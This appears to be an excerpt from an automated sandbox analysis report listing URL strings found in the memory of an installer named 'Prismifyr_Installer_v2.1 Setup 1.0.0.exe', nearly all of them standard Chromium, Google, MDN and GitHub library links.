Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xmlsoft.org/XSLT/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xmlsoft.org/XSLT/namespace
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xmlsoft.org/XSLT/namespacehttp://www.jclark.com/xtxsl:key
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xmlsoft.org/XSLT/xsltNewExtDef
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://%s:%d/.well-known/masque/udp/%s/%d/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://%s:%d/.well-known/masque/udp/%s/%d/Net.QuicStreamFactory.DefaultNetworkMatchNet.QuicSession.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://android.com/pay
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://android.googlesource.com/platform/external/puffin
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://beacons.gcp.gvt2.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://beacons.gcp.gvt2.com/domainreliability/uploadhttps://beacons.gvt2.com/domainreliability/uplo
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://beacons.gvt2.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://beacons2.gvt2.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://beacons3.gvt2.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://beacons4.gvt2.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://beacons5.gvt2.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://beacons5.gvt3.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bit.ly/audio-worklet)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bit.ly/audio-worklet)..
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://blog.chromium.org/2019/10/no-more-mixed-messages-about-https.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://blog.chromium.org/2019/10/no-more-mixed-messages-about-https.htmlMixed
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.chromium.org/p/gyp/issues/detail?id=530
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=es&category=theme81https://myactivity.google.com/myactivity/?u
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463544080.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=fa&category=theme81https://myactivity.google.com/myactivity/?u
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=fi&category=theme81https://myactivity.google.com/myactivity/?u
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=it&category=theme81https://myactivity.google.com/myactivity/?u
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471755683.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=sk&category=theme81https://myactivity.google.com/myactivity/?u
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromestatus.com/feature/5105856067141632.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463431471.000000000594C000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461793535.0000000005944000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471755683.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463544080.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473941850.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462255144.0000000005946000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461642034.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2472028493.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462894354.000000000594C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/chromium/src/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/external/github.com/intel/tinycbor.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/vulkan-deps/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/webm/libwebm
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/domainreliability/upload
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.google.com/p/gyp/issues/detail?id=411
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1038223.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1144908
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1144908.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1144908.The
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1144908Changing
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1429681
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/927119
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/927119..
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/981419
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://creativecommons.org/licenses/by/3.0/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/draft-ietf-rtcweb-ip-handling.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.apple.com/download/more/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.chrome.com/blog/enabling-shared-array-buffer/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.chrome.com/blog/immutable-document-domain/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.chrome.com/docs/extensions/mv3/cross-origin-isolation/.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.chrome.com/docs/extensions/mv3/service_workers/events/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.chrome.com/docs/extensions/mv3/service_workers/events/Script
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/JSON/stringify#The_
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/android/guides/setup
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/2/library/subprocess.html:
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/2/library/tempfile.html#tempfile.mkstemp
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.developer.apple.com/Developer_Tools/Command_Line_Tools_for_Xcode_11.5/Command_Line_
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#encode-and-enqueue-a-chunk
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#encode-and-flush
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://example.org
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://example.orgExpired
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/erichocean/5177582
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/BatikhSouri/node-cryptopp/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DennisOSRM/node-osrm)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/GPUOpen-LibrariesAndSDKs/VulkanMemoryAllocator
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/GoogleChrome/web-vitals
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/GoogleChromeLabs/text-fragments-polyfill
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Headers
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Headers.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Tools
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Tools.git
